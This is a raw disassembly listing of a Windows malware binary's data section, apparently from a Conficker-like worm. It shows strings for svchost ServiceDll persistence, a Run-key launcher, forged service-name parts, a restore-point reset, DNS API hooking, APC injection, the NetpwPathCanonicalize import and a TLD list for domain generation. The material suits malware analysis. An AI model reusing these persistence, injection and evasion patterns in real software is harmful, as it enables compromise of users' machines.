loc_9A2687: ; DATA XREF: .text:009B803C�o
; .text:009B80DC�o
add [edi+ebp*2+77h], ah
outsb
popa
add fs:[eax], al
loc_9A2690: ; DATA XREF: .text:009B8038�o
arpl [edi+6Eh], bp
loc_9A2693: ; DATA XREF: .text:009B8034�o
imul sp, [ebx+6Bh], 6100h
jbe short near ptr SubKey+40h
outsb
db 67h, 65h
jb near ptr 26A0h
; ---------------------------------------------------------------------------
aAutoruns db 'autoruns',0 ; DATA XREF: .text:009B8030�o
align 10h
stru_9A26B0 _msEH <0FFFFFFFFh, offset loc_9A413C, offset loc_9A4140>
; DATA XREF: sub_9A4074+5�o
align 10h
; const WCHAR SubKey
SubKey: ; DATA XREF: sub_9A471B+21�o
; sub_9A471B:loc_9A48F1�o
unicode 0, <SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost>,0
align 4
; wchar_t a_dll
a_dll: ; DATA XREF: sub_9A4157+23�o
unicode 0, <.dll>,0
align 4
aSystemCurrentc: ; DATA XREF: sub_9A4207+13�o
; sub_9A4358+4F�o
unicode 0, <SYSTEM\CurrentControlSet\Services\>,0
align 10h
; const WCHAR aServicedll
aServicedll: ; DATA XREF: sub_9A4358+182�o
; sub_9A7B42+254�o
unicode 0, <ServiceDll>,0
align 4
aParameters: ; DATA XREF: sub_9A4358+61�o
unicode 0, <\Parameters>,0
stru_9A27B0 _msEH <0FFFFFFFFh, 0, offset nullsub_1> ; DATA XREF: sub_9A4358+5�o
align 10h
stru_9A27C0 _msEH <0FFFFFFFFh, 0, offset nullsub_2> ; DATA XREF: sub_9A471B+2�o
dd 0C08956A1h, 11D11CD3h, 8000C5B1h, 0E27C15Fh ; DATA XREF: sub_9A49B2+8D�o
dword_9A27DC dd 20404h, 0 ; DATA XREF: sub_9A49B2+3E�o
; sub_9A4E45+4B�o
dd 0C0h, 46000000h
; IID stru_9A27EC
stru_9A27EC dd 5C63C1ADh ; Data1 ; DATA XREF: sub_9A4B7B+49�o
dw 3956h ; Data2
dw 4FF8h ; Data3
db 84h, 86h, 40h, 3, 47h, 58h, 31h, 5Bh; Data4
; IID stru_9A27FC
stru_9A27FC dd 0C08956B7h ; Data1 ; DATA XREF: sub_9A4B7B+41�o
dw 1CD3h ; Data2
dw 11D1h ; Data3
db 0B1h, 0C5h, 0, 80h, 5Fh, 0C1h, 27h, 0Eh; Data4
align 10h
stru_9A2810 _msEH <0FFFFFFFFh, offset loc_9A4BED, offset loc_9A4BF1>
; DATA XREF: sub_9A4B7B+2�o
; IID rclsid
rclsid dd 304CE942h ; Data1 ; DATA XREF: sub_9A4C0F+34�o
dw 6E39h ; Data2
dw 40D8h ; Data3
db 94h, 3Ah, 0B9h, 13h, 0C4h, 0Ch, 9Ch, 0D4h; Data4
; IID riid
riid dd 0F7898AF5h ; Data1 ; DATA XREF: sub_9A4C0F+2C�o
dw 0CAC4h ; Data2
dw 4632h ; Data3
db 0A2h, 0ECh, 0DAh, 6, 0E5h, 11h, 1Ah, 0F2h; Data4
; IID stru_9A283C
stru_9A283C dd 0CA545C6h ; Data1 ; DATA XREF: sub_9A4D36+72�o
dw 37ADh ; Data2
dw 4A6Ch ; Data3
db 0BFh, 92h, 9Fh, 76h, 10h, 6, 7Eh, 0F5h; Data4
; IID stru_9A284C
stru_9A284C dd 0E0483BA0h ; Data1 ; DATA XREF: sub_9A4D36+6A�o
; sub_9A4E45+94�o
dw 47FFh ; Data2
dw 4D9Ch ; Data3
db 0A6h, 0D6h, 77h, 41h, 0D0h, 0B1h, 95h, 0F7h; Data4
; wchar_t aSS_0
aSS_0: ; DATA XREF: sub_9A5033+8C�o
unicode 0, <%S %S>,0
stru_9A2868 _msEH <0FFFFFFFFh, offset loc_9A5129, offset loc_9A512D>
; DATA XREF: sub_9A5033+5�o
align 8
stru_9A2878 _msEH <0FFFFFFFFh, offset loc_9A5217, offset loc_9A521B>
; DATA XREF: sub_9A514A+5�o
; wchar_t a__
a__: ; DATA XREF: sub_9A52A3+1D�o
unicode 0, <\..\>,0
align 10h
stru_9A2890 _msEH <0FFFFFFFFh, offset loc_9A52EA, offset loc_9A52EE>
; DATA XREF: sub_9A52A3+2�o
align 10h
stru_9A28A0 _msEH <0FFFFFFFFh, offset loc_9A534D, offset loc_9A5351>
; DATA XREF: sub_9A5331+2�o
align 10h
stru_9A28B0 _msEH <0FFFFFFFFh, offset loc_9A53D5, offset loc_9A53D9>
; DATA XREF: sub_9A53AE+2�o
align 10h
stru_9A28C0 _msEH <0FFFFFFFFh, offset loc_9A54A0, offset loc_9A54A4>
; DATA XREF: sub_9A5421+5�o
align 10h
stru_9A28D0 _msEH <0FFFFFFFFh, offset loc_9A554D, offset loc_9A5551>
; DATA XREF: sub_9A54F9+5�o
align 10h
stru_9A28E0 _msEH <0FFFFFFFFh, offset loc_9A5602, offset loc_9A5606>
; DATA XREF: sub_9A55A2+5�o
align 10h
stru_9A28F0 _msEH <0FFFFFFFFh, offset loc_9A5708, offset loc_9A570C>
; DATA XREF: sub_9A5656+5�o
align 10h
stru_9A2900 _msEH <0FFFFFFFFh, 0, offset nullsub_3> ; DATA XREF: sub_9A5729+2�o
align 10h
stru_9A2910 _msEH <0FFFFFFFFh, offset loc_9A58A2, offset loc_9A58A6>
; DATA XREF: sub_9A57C1+5�o
align 10h
stru_9A2920 _msEH <0FFFFFFFFh, offset loc_9A5A67, offset loc_9A5A6B>
; DATA XREF: sub_9A5938+2�o
; char dword_9A292C[]
dword_9A292C dd 6174656Eh, 32336970h, 6C6C642Eh, 0 ; DATA XREF: sub_9A5B0F+B�o
; char aNetpwpathcanon[]
aNetpwpathcanon db 'NetpwPathCanonicalize',0 ; DATA XREF: sub_9A5B0F+6�o
align 4
; char aNtdll_dll[]
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_9A5B2E+B�o
; sub_9A642B+CB�o ...
align 10h
; char aNtqueryinforma[]
aNtqueryinforma db 'NtQueryInformationProcess',0 ; DATA XREF: sub_9A5B2E+6�o
; sub_9A6678+8�o ...
align 4
; char aQuery_main[]
aQuery_main db 'Query_Main',0 ; DATA XREF: sub_9A5B4D+52�o
align 4
; char aDnsquery_w[]
aDnsquery_w db 'DnsQuery_W',0 ; DATA XREF: sub_9A5B4D+3B�o
align 4
; char aDnsquery_utf8[]
aDnsquery_utf8 db 'DnsQuery_UTF8',0 ; DATA XREF: sub_9A5B4D+24�o
align 4
; char aDnsapi_dll[]
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_9A5B4D+F�o
align 10h
; char aDnsquery_a[]
aDnsquery_a db 'DnsQuery_A',0 ; DATA XREF: sub_9A5B4D+A�o
align 4
; char aWs2_32_dll[]
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_9A5BCD+20�o
align 4
; char aSendto[]
aSendto db 'sendto',0 ; DATA XREF: sub_9A5BCD+1B�o
align 10h
; char ModuleName[]
ModuleName db 'dnsrslvr.dll',0 ; DATA XREF: sub_9A5BCD�o
align 10h
; const WCHAR aSvchost_exeKNe
aSvchost_exeKNe: ; DATA XREF: sub_9A5C01:loc_9A5C04�o
unicode 0, <svchost.exe -k NetworkService>,0
; char aWininet_dll[]
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_9A5C69+B�o
; char aInternetgetc_0[]
aInternetgetc_0 db 'InternetGetConnectedState',0 ; DATA XREF: sub_9A5C69+6�o
align 4
; char aKernel32_dll[]
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_9A5EC7+36�o
; sub_9A642B+6D�o ...
align 8
stru_9A2A58 _msEH <0FFFFFFFFh, offset loc_9A6379, offset loc_9A637D>
; DATA XREF: sub_9A62C0+2�o
; char aLoadlibraryexa[]
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_9A642B:loc_9A6520�o
align 4
; char aNtqueueapcthre[]
aNtqueueapcthre db 'NtQueueApcThread',0 ; DATA XREF: sub_9A642B:loc_9A64F1�o
align 4
; char ProcName[]
ProcName db 'LoadLibraryA',0 ; DATA XREF: sub_9A642B+68�o
align 4
; char aNtsetinformati[]
aNtsetinformati db 'NtSetInformationProcess',0 ; DATA XREF: sub_9A67C6+24�o
stru_9A2AB0 _msEH <0FFFFFFFFh, offset loc_9A69E5, offset loc_9A69E9>
; DATA XREF: sub_9A68CA+2�o
align 10h
stru_9A2AC0 _msEH <0FFFFFFFFh, offset loc_9A6CBB, offset loc_9A6CBF>
; DATA XREF: sub_9A6BEB+2�o
; char aSetakeownershi[]
aSetakeownershi db 'SeTakeOwnershipPrivilege',0 ; DATA XREF: sub_9A6E36+4�o
align 4
stru_9A2AE8 _msEH <0FFFFFFFFh, 0, offset sub_9A6F78> ; DATA XREF: sub_9A6E7C+2�o
; wchar_t aSS
aSS: ; DATA XREF: sub_9A6F7B+64�o
unicode 0, <%s\%s>,0
aUsers: ; DATA XREF: sub_9A6F7B+3E�o
unicode 0, <USERS>,0
aMachine: ; DATA XREF: sub_9A6F7B+30�o
unicode 0, <MACHINE>,0
aCurrent_user: ; DATA XREF: sub_9A6F7B+22�o
unicode 0, <CURRENT_USER>,0
align 4
aClasses_root: ; DATA XREF: sub_9A6F7B+14�o
unicode 0, <CLASSES_ROOT>,0
align 8
stru_9A2B58 _msEH <0FFFFFFFFh, 0, offset nullsub_5> ; DATA XREF: sub_9A7177+2�o
; char PrefixString[]
PrefixString db '0',0 ; DATA XREF: sub_9A7214+4A�o
align 4
aPolicy: ; DATA XREF: .text:009B8344�o
unicode 0, <Policy>,0
align 4
aDiscovery: ; DATA XREF: .text:009B8340�o
unicode 0, <Discovery>,0
aStorage: ; DATA XREF: .text:009B833C�o
unicode 0, <Storage>,0
aPower: ; DATA XREF: .text:009B8338�o
unicode 0, <Power>,0
aLogon: ; DATA XREF: .text:009B8334�o
unicode 0, <Logon>,0
aMachine_0: ; DATA XREF: .text:009B8330�o
unicode 0, <Machine>,0
aBrowser: ; DATA XREF: .text:009B832C�o
unicode 0, <Browser>,0
aManagement: ; DATA XREF: .text:009B8328�o
unicode 0, <Management>,0
align 4
aFramework: ; DATA XREF: .text:009B8324�o
unicode 0, <Framework>,0
aComponent: ; DATA XREF: .text:009B8320�o
unicode 0, <Component>,0
aTrusted: ; DATA XREF: .text:009B831C�o
unicode 0, <Trusted>,0
aBackup: ; DATA XREF: .text:009B8318�o
unicode 0, <Backup>,0
align 4
aNotify: ; DATA XREF: .text:009B8314�o
unicode 0, <Notify>,0
align 4
aAudit: ; DATA XREF: .text:009B830C�o
unicode 0, <Audit>,0
aControl: ; DATA XREF: .text:009B8308�o
unicode 0, <Control>,0
aHardware: ; DATA XREF: .text:009B8304�o
unicode 0, <Hardware>,0
align 4
aWindows: ; DATA XREF: .text:009B8300�o
unicode 0, <Windows>,0
aUpdate: ; DATA XREF: .text:009B82FC�o
unicode 0, <Update>,0
align 4
aUniversal: ; DATA XREF: .text:009B82F8�o
unicode 0, <Universal>,0
aTask: ; DATA XREF: .text:009B82F0�o
unicode 0, <Task>,0
align 4
aSupport: ; DATA XREF: .text:009B82E8�o
unicode 0, <Support>,0
aShell: ; DATA XREF: .text:009B82E4�o
unicode 0, <Shell>,0
aSecurity: ; DATA XREF: .text:009B82DC�o
unicode 0, <Security>,0
align 4
aNetwork: ; DATA XREF: .text:009B82D8�o
unicode 0, <Network>,0
aMonitor: ; DATA XREF: .text:009B82D4�o
unicode 0, <Monitor>,0
aMicrosoft: ; DATA XREF: .text:009B82D0�o
unicode 0, <Microsoft>,0
aManager: ; DATA XREF: .text:009B82CC�o
unicode 0, <Manager>,0
aInstaller: ; DATA XREF: .text:009B82C8�o
unicode 0, <Installer>,0
aImage: ; DATA XREF: .text:009B82C4�o
unicode 0, <Image>,0
aHelper: ; DATA XREF: .text:009B82C0�o
unicode 0, <Helper>,0
align 4
aDriver: ; DATA XREF: .text:009B82BC�o
unicode 0, <Driver>,0
align 4
aConfig: ; DATA XREF: .text:009B82B8�o
unicode 0, <Config>,0
align 4
aCenter: ; DATA XREF: .text:009B82B4�o
unicode 0, <Center>,0
align 4
aBoot: ; DATA XREF: .text:009B82B0�o
unicode 0, <Boot>,0
align 4
aTime_0: ; DATA XREF: .text:009B82A8�o
; .text:009B82F4�o
unicode 0, <Time>,0
align 10h
aSystem: ; DATA XREF: .text:009B82A4�o
; .text:009B82EC�o
unicode 0, <System>,0
align 10h
aSvc: ; DATA XREF: .text:009B82A0�o
unicode 0, <svc>,0
aSvc_0: ; DATA XREF: .text:009B829C�o
unicode 0, <Svc>,0
aSrv: ; DATA XREF: .text:009B8298�o
unicode 0, <srv>,0
aSrv_0: ; DATA XREF: .text:009B8294�o
unicode 0, <Srv>,0
aService: ; DATA XREF: .text:009B8290�o
unicode 0, <Service>,0
aServer: ; DATA XREF: .text:009B828C�o
; .text:009B82E0�o
unicode 0, <Server>,0
align 10h
aServ_0: ; DATA XREF: .text:009B8288�o
unicode 0, <serv>,0
align 4
aProv: ; DATA XREF: .text:009B8284�o
unicode 0, <prov>,0
align 4
aMon: ; DATA XREF: .text:009B8280�o
unicode 0, <mon>,0
aMgmt: ; DATA XREF: .text:009B827C�o
unicode 0, <mgmt>,0
align 4
aMan: ; DATA XREF: .text:009B8278�o
unicode 0, <man>,0
aLogon_0: ; DATA XREF: .text:009B8274�o
unicode 0, <logon>,0
aAuto: ; DATA XREF: .text:009B8270�o
unicode 0, <auto>,0
align 4
aAgent: ; DATA XREF: .text:009B826C�o
unicode 0, <agent>,0
aAccess: ; DATA XREF: .text:009B8268�o
unicode 0, <access>,0
align 4
aXml: ; DATA XREF: .text:009B8264�o
unicode 0, <xml>,0
aWuau: ; DATA XREF: .text:009B8260�o
unicode 0, <wuau>,0
align 4
aWsc: ; DATA XREF: .text:009B825C�o
unicode 0, <wsc>,0
aWmi: ; DATA XREF: .text:009B8258�o
unicode 0, <Wmi>,0
aWmdm: ; DATA XREF: .text:009B8254�o
unicode 0, <Wmdm>,0
align 4
aWin: ; DATA XREF: .text:009B8250�o
unicode 0, <win>,0
aW32: ; DATA XREF: .text:009B824C�o
unicode 0, <W32>,0
aTrk: ; DATA XREF: .text:009B8248�o
unicode 0, <Trk>,0
aTapi: ; DATA XREF: .text:009B8244�o
unicode 0, <Tapi>,0
align 4
aSr: ; DATA XREF: .text:009B8240�o
unicode 0, <SR>,0
align 4
aSec: ; DATA XREF: .text:009B823C�o
unicode 0, <Sec>,0
aRemote: ; DATA XREF: .text:009B8238�o
unicode 0, <Remote>,0
align 4
aRas: ; DATA XREF: .text:009B8234�o
unicode 0, <Ras>,0
aNtms: ; DATA XREF: .text:009B8230�o
unicode 0, <Ntms>,0
align 10h
aNet: ; DATA XREF: .text:009B822C�o
unicode 0, <Net>,0
aLanman: ; DATA XREF: .text:009B8228�o
unicode 0, <Lanman>,0
align 4
aIr: ; DATA XREF: .text:009B8224�o
unicode 0, <Ir>,0
align 10h
aIas: ; DATA XREF: .text:009B8220�o
unicode 0, <Ias>,0
aHelp: ; DATA XREF: .text:009B821C�o
unicode 0, <help>,0
align 4
aEvent: ; DATA XREF: .text:009B8218�o
; .text:009B8310�o
unicode 0, <Event>,0
aEr: ; DATA XREF: .text:009B8214�o
unicode 0, <ER>,0
align 4
aDm: ; DATA XREF: .text:009B8210�o
unicode 0, <DM>,0
align 10h
aAudio: ; DATA XREF: .text:009B820C�o
unicode 0, <Audio>,0
aApp: ; DATA XREF: .text:009B8208�o
unicode 0, <App>,0
; char aResetsr[]
aResetsr db 'ResetSR',0 ; DATA XREF: sub_9A731F+22�o
; char LibFileName[]
LibFileName db 'srclient.dll',0 ; DATA XREF: sub_9A731F+C�o
align 10h
stru_9A2F60 _msEH <0FFFFFFFFh, offset loc_9A735A, offset loc_9A735E>
; DATA XREF: sub_9A731F+2�o
; wchar_t Str
Str dw 0 ; DATA XREF: sub_9A7374+2A8�o
align 10h
dword_9A2F70 dd 0FFFFFFFFh, 9A7605h, 9A7609h, 0 ; DATA XREF: sub_9A7374+5�o
aSoftwareMicr_0: ; DATA XREF: sub_9A7641+35�o
unicode 0, <SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost>,0
align 10h
stru_9A2FF0 _msEH <0FFFFFFFFh, offset loc_9A7AF8, offset loc_9A7AFC>
; DATA XREF: sub_9A7641+5�o
; const WCHAR aParameters_0
aParameters_0: ; DATA XREF: sub_9A7B42+231�o
unicode 0, <Parameters>,0
align 4
; const WCHAR aDescription
aDescription: ; DATA XREF: sub_9A7B42+219�o
unicode 0, <Description>,0
; const WCHAR aObjectname
aObjectname: ; DATA XREF: sub_9A7B42+1FE�o
unicode 0, <ObjectName>,0
align 4
; BYTE Data
Data: ; DATA XREF: sub_9A7B42+1F6�o
unicode 0, <LocalSystem>,0
; const WCHAR aImagepath
aImagepath: ; DATA XREF: sub_9A7B42+1EA�o
unicode 0, <ImagePath>,0
; const WCHAR aErrorcontrol
aErrorcontrol: ; DATA XREF: sub_9A7B42+1CC�o
unicode 0, <ErrorControl>,0
align 4
; const WCHAR aStart
aStart: ; DATA XREF: sub_9A7B42+1B2�o
unicode 0, <Start>,0
; const WCHAR aType
aType: ; DATA XREF: sub_9A7B42+198�o
unicode 0, <Type>,0
align 4
; const WCHAR ValueName
ValueName: ; DATA XREF: sub_9A7B42+185�o
unicode 0, <DisplayName>,0
; wchar_t asc_9A30BC
asc_9A30BC: ; DATA XREF: sub_9A7B42+D1�o
unicode 0, <\>,0
aSystemCurren_0: ; DATA XREF: sub_9A7B42+B4�o
unicode 0, <SYSTEM\CurrentControlSet\Services>,0
align 8
aSystemrootSyst: ; DATA XREF: sub_9A7B42+47�o
unicode 0, <%SystemRoot%\system32\svchost.exe -k >,0
align 8
; const WCHAR aSoftwareMicr_1
aSoftwareMicr_1: ; DATA XREF: sub_9A7E0F+1E8�o
unicode 0, <Software\Microsoft\Windows\CurrentVersion\Run>,0
; wchar_t aRundll32_exeSS
aRundll32_exeSS: ; DATA XREF: sub_9A7E0F+1BD�o
unicode 0, <rundll32.exe "%s",%S>,0
align 10h
; wchar_t asc_9A31E0
asc_9A31E0: ; DATA XREF: sub_9A7E0F+F9�o
unicode 0, < >,0
aVn db 'vn',0 ; DATA XREF: .text:009B876C�o
align 4
aVc db 'vc',0 ; DATA XREF: .text:009B8768�o
align 4
aUs db 'us',0 ; DATA XREF: .text:009B8764�o
align 10h
aTw db 'tw',0 ; DATA XREF: .text:009B8760�o
align 4
aTo db 'to',0 ; DATA XREF: .text:009B875C�o
align 4
aTn db 'tn',0 ; DATA XREF: .text:009B8758�o
align 4
aTl db 'tl',0 ; DATA XREF: .text:009B8754�o
align 10h
aTj db 'tj',0 ; DATA XREF: .text:009B8750�o
align 4
aTc db 'tc',0 ; DATA XREF: .text:009B874C�o
align 4
aSu db 'su',0 ; DATA XREF: .text:009B8748�o
align 4
aSk db 'sk',0 ; DATA XREF: .text:009B8744�o
align 10h
aSh db 'sh',0 ; DATA XREF: .text:009B8740�o
align 4
aSg db 'sg',0 ; DATA XREF: .text:009B873C�o
align 4
aSc db 'sc',0 ; DATA XREF: .text:009B8738�o
align 4
aRu db 'ru',0 ; DATA XREF: .text:009B8734�o
align 10h
aRo db 'ro',0 ; DATA XREF: .text:009B8730�o
align 4
aPs db 'ps',0 ; DATA XREF: .text:009B872C�o
align 4
aPl db 'pl',0 ; DATA XREF: .text:009B8728�o
align 4
aPk db 'pk',0 ; DATA XREF: .text:009B8724�o
align 10h
aPe db 'pe',0 ; DATA XREF: .text:009B8720�o
align 4
aNo db 'no',0 ; DATA XREF: .text:009B871C�o
align 4
aNl db 'nl',0 ; DATA XREF: .text:009B8718�o
align 4
aNf db 'nf',0 ; DATA XREF: .text:009B8714�o
align 10h
aMy db 'my',0 ; DATA XREF: .text:009B8710�o
align 4
aMw db 'mw',0 ; DATA XREF: .text:009B870C�o
align 4
aMu db 'mu',0 ; DATA XREF: .text:009B8708�o
align 4
aMs db 'ms',0 ; DATA XREF: .text:009B8704�o
align 10h
aMn db 'mn',0 ; DATA XREF: .text:009B8700�o
align 4
aMe db 'me',0 ; DATA XREF: .text:009B86FC�o
align 4
aMd db 'md',0 ; DATA XREF: .text:009B86F8�o
align 4
aLy db 'ly',0 ; DATA XREF: .text:009B86F4�o
align 10h
aLv db 'lv',0 ; DATA XREF: .text:009B86F0�o
align 4
aLu db 'lu',0 ; DATA XREF: .text:009B86EC�o
align 4
aLi db 'li',0 ; DATA XREF: .text:009B86E8�o
align 4
aLc db 'lc',0 ; DATA XREF: .text:009B86E4�o
align 10h
aLa db 'la',0 ; DATA XREF: .text:009B86E0�o
align 4
aKz db 'kz',0 ; DATA XREF: .text:009B86DC�o
align 4
aKn db 'kn',0 ; DATA XREF: .text:009B86D8�o
align 4
aIs db 'is',0 ; DATA XREF: .text:009B86D4�o
align 10h
aIr_0 db 'ir',0 ; DATA XREF: .text:009B86D0�o
align 4
aIn db 'in',0 ; DATA XREF: .text:009B86CC�o
align 4
aIm db 'im',0 ; DATA XREF: .text:009B86C8�o
align 4
aIe db 'ie',0 ; DATA XREF: .text:009B86C4�o
align 10h
aHu db 'hu',0 ; DATA XREF: .text:009B86C0�o
align 4
aHt db 'ht',0 ; DATA XREF: .text:009B86BC�o
align 4
aHn db 'hn',0 ; DATA XREF: .text:009B86B8�o
align 4
aHk db 'hk',0 ; DATA XREF: .text:009B86B4�o
align 10h
aGy db 'gy',0 ; DATA XREF: .text:009B86B0�o
align 4
aGs db 'gs',0 ; DATA XREF: .text:009B86AC�o
align 4
aGr db 'gr',0 ; DATA XREF: .text:009B86A8�o
align 4
aGd db 'gd',0 ; DATA XREF: .text:009B86A4�o
align 10h
aFr db 'fr',0 ; DATA XREF: .text:009B86A0�o
align 4
aFm db 'fm',0 ; DATA XREF: .text:009B869C�o
align 4
aEs db 'es',0 ; DATA XREF: .text:009B8698�o
align 4
aEc db 'ec',0 ; DATA XREF: .text:009B8694�o
align 10h
aDm_0 db 'dm',0 ; DATA XREF: .text:009B8690�o
align 4
aDk db 'dk',0 ; DATA XREF: .text:009B868C�o
align 4
aDj db 'dj',0 ; DATA XREF: .text:009B8688�o
align 4
aCz db 'cz',0 ; DATA XREF: .text:009B8684�o
align 10h
aCx db 'cx',0 ; DATA XREF: .text:009B8680�o
align 4
aCom_ve db 'com.ve',0 ; DATA XREF: .text:009B867C�o
align 4
aCom_uy db 'com.uy',0 ; DATA XREF: .text:009B8678�o
align 4
aCom_ua db 'com.ua',0 ; DATA XREF: .text:009B8674�o
align 4
aCom_tw db 'com.tw',0 ; DATA XREF: .text:009B8670�o
align 4
aCom_tt db 'com.tt',0 ; DATA XREF: .text:009B866C�o
align 4
aCom_tr db 'com.tr',0 ; DATA XREF: .text:009B8668�o
align 4
aCom_sv db 'com.sv',0 ; DATA XREF: .text:009B8664�o
align 4
aCom_py db 'com.py',0 ; DATA XREF: .text:009B8660�o
align 4
aCom_pt db 'com.pt',0 ; DATA XREF: .text:009B865C�o
align 4
aCom_pr db 'com.pr',0 ; DATA XREF: .text:009B8658�o
align 4
aCom_pe db 'com.pe',0 ; DATA XREF: .text:009B8654�o
align 4
aCom_pa db 'com.pa',0 ; DATA XREF: .text:009B8650�o
align 4
aCom_ni db 'com.ni',0 ; DATA XREF: .text:009B864C�o
align 4
aCom_ng db 'com.ng',0 ; DATA XREF: .text:009B8648�o
align 4
aCom_mx db 'com.mx',0 ; DATA XREF: .text:009B8644�o
align 4
aCom_mt db 'com.mt',0 ; DATA XREF: .text:009B8640�o
align 4
aCom_lc db 'com.lc',0 ; DATA XREF: .text:009B863C�o
align 4
aCom_ki db 'com.ki',0 ; DATA XREF: .text:009B8638�o
align 4
aCom_jm db 'com.jm',0 ; DATA XREF: .text:009B8634�o
align 4
aCom_hn db 'com.hn',0 ; DATA XREF: .text:009B8630�o
align 4
aCom_gt db 'com.gt',0 ; DATA XREF: .text:009B862C�o
align 4
aCom_gl db 'com.gl',0 ; DATA XREF: .text:009B8628�o
align 4
aCom_gh db 'com.gh',0 ; DATA XREF: .text:009B8624�o
align 4
aCom_fj db 'com.fj',0 ; DATA XREF: .text:009B8620�o
align 4
aCom_do db 'com.do',0 ; DATA XREF: .text:009B861C�o
align 4
aCom_co db 'com.co',0 ; DATA XREF: .text:009B8618�o
align 4
aCom_bs db 'com.bs',0 ; DATA XREF: .text:009B8614�o
align 4
aCom_br db 'com.br',0 ; DATA XREF: .text:009B8610�o
align 4
aCom_bo db 'com.bo',0 ; DATA XREF: .text:009B860C�o
align 4
aCom_ar db 'com.ar',0 ; DATA XREF: .text:009B8608�o
align 4
aCom_ai db 'com.ai',0 ; DATA XREF: .text:009B8604�o
align 4
aCom_ag db 'com.ag',0 ; DATA XREF: .text:009B8600�o
align 4
aCo_za db 'co.za',0 ; DATA XREF: .text:009B85FC�o
align 4
aCo_vi db 'co.vi',0 ; DATA XREF: .text:009B85F8�o
align 4
aCo_uk db 'co.uk',0 ; DATA XREF: .text:009B85F4�o
align 4
aCo_ug db 'co.ug',0 ; DATA XREF: .text:009B85F0�o
align 4
aCo_nz db 'co.nz',0 ; DATA XREF: .text:009B85EC�o
align 4
aCo_kr db 'co.kr',0 ; DATA XREF: .text:009B85E8�o
align 4
aCo_ke db 'co.ke',0 ; DATA XREF: .text:009B85E4�o
align 4
aCo_il db 'co.il',0 ; DATA XREF: .text:009B85E0�o
align 4
aCo_id db 'co.id',0 ; DATA XREF: .text:009B85DC�o
align 4
aCo_cr db 'co.cr',0 ; DATA XREF: .text:009B85D8�o
align 4
aCn db 'cn',0 ; DATA XREF: .text:009B85D4�o
align 4
aCl db 'cl',0 ; DATA XREF: .text:009B85D0�o
align 4
aCh db 'ch',0 ; DATA XREF: .text:009B85CC�o
align 10h
aCd db 'cd',0 ; DATA XREF: .text:009B85C8�o
align 4
aCa db 'ca',0 ; DATA XREF: .text:009B85C4�o
align 4
aBz db 'bz',0 ; DATA XREF: .text:009B85C0�o
align 4
aBo db 'bo',0 ; DATA XREF: .text:009B85BC�o
align 10h
aBe db 'be',0 ; DATA XREF: .text:009B85B8�o
align 4
aAt db 'at',0 ; DATA XREF: .text:009B85B4�o
align 4
aAs db 'as',0 ; DATA XREF: .text:009B85B0�o
align 4
aAm db 'am',0 ; DATA XREF: .text:009B85AC�o
align 10h
aAg db 'ag',0 ; DATA XREF: .text:009B85A8�o
align 4
aAe db 'ae',0 ; DATA XREF: .text:009B85A4�o
align 4
aAc db 'ac',0 ; DATA XREF: .text:009B85A0�o
align 4
aDec db 'Dec',0 ; DATA XREF: .text:009B859C�o
aNov db 'Nov',0 ; DATA XREF: .text:009B8598�o
aOct db 'Oct',0 ; DATA XREF: .text:009B8594�o
aSep db 'Sep',0 ; DATA XREF: .text:009B8590�o
aAug db 'Aug',0 ; DATA XREF: .text:009B858C�o
aJul db 'Jul',0 ; DATA XREF: .text:009B8588�o
aJun db 'Jun',0 ; DATA XREF: .text:009B8584�o
aMay db 'May',0 ; DATA XREF: .text:009B8580�o
aApr db 'Apr',0 ; DATA XREF: .text:009B857C�o
aMar db 'Mar',0 ; DATA XREF: .text:009B8578�o
aFeb db 'Feb',0 ; DATA XREF: .text:009B8574�o
aJan db 'Jan',0 ; DATA XREF: .text:009B8570�o
aRapidshare_com db 'rapidshare.com',0 ; DATA XREF: .text:009B856C�o
align 4
aImageshack_us db 'imageshack.us',0 ; DATA XREF: .text:009B8568�o
align 4
aFacebook_com db 'facebook.com',0 ; DATA XREF: .text:009B8564�o
align 4
aW3_org db 'w3.org',0 ; DATA XREF: .text:009B8560�o
align 4
aAsk_com db 'ask.com',0 ; DATA XREF: .text:009B855C�o
aYahoo_com db 'yahoo.com',0 ; DATA XREF: .text:009B8558�o
align 4
aGoogle_com db 'google.com',0 ; DATA XREF: .text:009B8554�o
align 4
aBaidu_com db 'baidu.com',0 ; DATA XREF: .text:off_9B8550�o
align 10h
; char Delim[]
Delim db ', ',0 ; DATA XREF: sub_9A82C5+5A�o
align 4
; char aHttpWww_S[]
aHttpWww_S db 'http://www.%s',0 ; DATA XREF: sub_9A83C7+36�o
align 8
dbl_9A3508 dq 9.46270391e-1 ; DATA XREF: sub_9A84A9+A6�r
; char aHttpS[]
aHttpS db 'http://%s',0 ; DATA XREF: sub_9A857A+24F�o
align 4
; char a_[]
a_ db '.',0 ; DATA XREF: sub_9A857A+101�o
align 10h
stru_9A3520 _msEH <0FFFFFFFFh, offset loc_9A885B, offset loc_9A885F>
; DATA XREF: sub_9A857A+5�o
align 10h
dd offset loc_9A8803
; ---------------------------------------------------------------------------
pop es
mov [edx-100h], bl
push dword ptr [edi-44FF6578h]
mov [edx+0], bl
add [eax-7EDBDA31h], ah ; DATA XREF: sub_9A8FF3+B6�o
retn 7311h
; ---------------------------------------------------------------------------
dd 34AAC8E7h, 64322864h, 0EF68B7C1h, 0B60450E9h, 8D9F06F1h
dd 0E8FB2390h, 0A691E5BFh, 0DD2E76CBh, 2C30BC41h, 0CD0D63Bh
dd 23058F8Ah, 1F8CCF68h, 88E3775Dh, 54E5ED5Bh, 0A6D6031h
dd 4AD12AAEh, 88222E0Dh, 3E7F16BBh, 3FB50C2Ch, 8AF8671Dh
dd 8BD25C31h, 995AD117h, 4C4B633h, 0C878C1DDh, 7A1552ACh
dd 3B72066Ch, 631EFFCBh, 0D6F3522h, 89ABCDEFh, 1234567h
dd 2425CFA0h, 7311C281h
; char szProvider[]
szProvider db 'Microsoft Base Cryptographic Provider v1.0',0
; DATA XREF: sub_9AA577+4B�o
align 10h
stru_9A3600 _msEH <0FFFFFFFFh, offset loc_9AAAAD, offset loc_9AAAB1>
; DATA XREF: sub_9AAAC1-2F�o
dd 5 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
